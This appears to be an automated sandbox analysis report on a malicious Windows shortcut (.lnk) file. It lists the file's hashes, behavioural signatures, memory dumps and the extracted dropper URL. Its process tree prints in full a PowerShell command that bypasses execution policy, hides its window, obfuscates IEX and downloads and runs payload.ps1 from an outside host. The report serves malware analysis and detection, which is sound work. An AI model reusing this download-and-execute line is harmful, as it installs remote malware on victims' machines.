Overview

overview

10

Static

static

1

0f332a1fc9...18.lnk

windows7-x64

10

0f332a1fc9...18.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    125s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/05/2024, 23:59

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    0f332a1fc94ab197265e72316830f9c8_JaffaCakes118.lnk

  • Size

    2KB

  • MD5

    0f332a1fc94ab197265e72316830f9c8

  • SHA1

    c03695ae826a6e0763e98bdbb33a2cfbec7cadc4

  • SHA256

    60a34b932b8d6dfbd8f69853862a25c395eb8e0541a90aee88ac60724fd5a3db

  • SHA512

    b6a5b083e803b7f8ff3df82748f60452cea157b052a41a0ffcc49c9866e718c7f085cef1257f44173aeaf186016378b73df337d85334a843076f55665a0f2fb2

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://checkerrors.ug./payload.ps1

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\0f332a1fc94ab197265e72316830f9c8_JaffaCakes118.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec bypass -windo 1 $cd=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVY'));sal t $cd;$dc=((New-Object Net.WebClient)).DownloadString('http://checkerrors.ug./payload.ps1');t $dc
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2492

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_leauq3ge.ltf.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • memory/2492-2-0x00007FFFBAA33000-0x00007FFFBAA35000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2492-12-0x000001E65F780000-0x000001E65F7A2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2492-13-0x00007FFFBAA30000-0x00007FFFBB4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2492-14-0x00007FFFBAA30000-0x00007FFFBB4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2492-15-0x00007FFFBAA30000-0x00007FFFBB4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2492-16-0x00007FFFBAA30000-0x00007FFFBB4F1000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2492-19-0x00007FFFBAA30000-0x00007FFFBB4F1000-memory.dmp

          Filesize

          10.8MB

          Download